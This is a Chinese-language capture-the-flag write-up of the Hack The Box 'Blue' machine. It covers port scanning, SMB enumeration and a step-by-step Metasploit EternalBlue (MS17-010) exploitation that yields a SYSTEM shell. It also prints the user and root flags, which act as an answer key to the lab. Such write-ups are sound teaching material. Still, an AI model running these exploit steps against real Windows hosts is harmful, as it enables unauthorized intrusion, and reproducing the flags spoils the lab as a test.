HTB：Blue[WriteUP]

连接至HTB服务器并启动靶机

1.How many open TCP ports are listening on Blue? Don't include any 5-digit ports.

2.What is the hostname of Blue?

3.What operating system is running on the target machine? Give a two-word answer with a name and high-level version.

4.How many SMB shares are available on Blue?

5.What 2017 Microsoft Security Bulletin number describes a remote code execution vulnerability in SMB?

6.Optional question: A worm was set loose on the internet in May 2017 propagating primarily through MS17-010. What is the famous name for that malware?

7.What user do you get execution with when exploiting MS17-010? Include the full name, including anything before a .

使用永恒之蓝漏洞利用模块

Submit the flag located on the haris user's desktop.

USER_FLAG：7d5194b6a52723e63df80d92d8f1f72a

Submit the flag located on the administrator's desktop.

ROOT_FLAG：8478051c6ce0f182fe1a03ce1f63624d

连接至HTB服务器并启动靶机

靶机IP：10.10.10.40

分配IP：10.10.16.5

1.How many open TCP ports are listening on Blue? Don't include any 5-digit ports.

使用fscan对靶机进行端口扫描：

fscan -nopoc -nobr -no -h {TARGET_IP}

由fscan扫描结果可见，靶机开放端口：135、139、445 共3个端口

2.What is the hostname of Blue?

使用nmap对靶机开放端口进行脚本、版本信息扫描：

nmap -sC -sV -p 135,139,445 {TARGET_IP}

由扫描结果可见，靶机主机名为：haris-PC

3.What operating system is running on the target machine? Give a two-word answer with a name and high-level version.

由上文nmap扫描结果可见，靶机系统为：Windows 7

4.How many SMB shares are available on Blue?

列出靶机所有共享，空密码进入：

smbclient -L {TARGET_IP}

由输出结果可见，靶机启用共享：ADMIN$、C$、IPC$、Share、Users。共5个共享

5.What 2017 Microsoft Security Bulletin number describes a remote code execution vulnerability in SMB?

2017 年描述 SMB 中远程代码执行漏洞的微软安全公告编号是 MS17-010

此安全更新解决了 Microsoft Windows 中的漏洞。其中最严重的漏洞可能在攻击者向 Microsoft Server Message Block 1.0（SMBv1）服务器发送特制消息时允许远程代码执行。受影响的操作系统包括各种版本，如 Windows Vista、Windows Server 2008、Windows 7 和 Windows 8 等。

6.Optional question: A worm was set loose on the internet in May 2017 propagating primarily through MS17-010. What is the famous name for that malware?

恶意软件的著名名称是 WannaCry（永恒之蓝勒索病毒）

7.What user do you get execution with when exploiting MS17-010? Include the full name, including anything before a .

进入msfconsole控制台

msfconsole

使用auxiliary/scanner/smb/smb_ms17_010模块

use auxiliary/scanner/smb/smb_ms17_010

展示该模块的所有可填选项

show options

将靶机IP填入RHOSTS选项中

set rhosts {TARGET_IP}

输入run命令执行ms17-010漏洞扫描

run

由扫描结果可见，靶机极有可能存在MS17-010漏洞

使用永恒之蓝漏洞利用模块

使用use命令直接使用该eternalblue模块

use exploit/windows/smb/ms17_010_eternalblue

展示可填入选项

show options

将靶机IP填入RHOSTS选项中

set rhosts {TARGET_IP}

设置目标系统为Windows 7

set target Windows 7

将本机IP填入LHOST选项中

set lhost {NATIVE_IP}

执行run或exploit开始进行漏洞利用

run
exploit

在Meterpreter下执行：

getuid

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

可得服务器用户名为：NT AUTHORITY\SYSTEM

Submit the flag located on the haris user's desktop.

切换到cmd

shell

查看位于haris用户Desktop目录下的user.txt文件内容：

type C:\Users\haris\Desktop\user.txt

USER_FLAG：7d5194b6a52723e63df80d92d8f1f72a

Submit the flag located on the administrator's desktop.

查看位于Administrator用户Desktop目录下的root.txt文件内容：

type C:\Users\Administrator\Desktop\root.txt

HTB：Blue[WriteUP]

连接至HTB服务器并启动靶机

1.How many open TCP ports are listening on Blue? Don't include any 5-digit ports.

2.What is the hostname of Blue?

3.What operating system is running on the target machine? Give a two-word answer with a name and high-level version.

4.How many SMB shares are available on Blue?

5.What 2017 Microsoft Security Bulletin number describes a remote code execution vulnerability in SMB?

6.Optional question: A worm was set loose on the internet in May 2017 propagating primarily through MS17-010. What is the famous name for that malware?

7.What user do you get execution with when exploiting MS17-010? Include the full name, including anything before a .

使用永恒之蓝漏洞利用模块

Submit the flag located on the haris user's desktop.

USER_FLAG：7d5194b6a52723e63df80d92d8f1f72a

Submit the flag located on the administrator's desktop.

ROOT_FLAG：8478051c6ce0f182fe1a03ce1f63624d

相关资讯

热文排行

最新新闻

推荐新闻

热搜词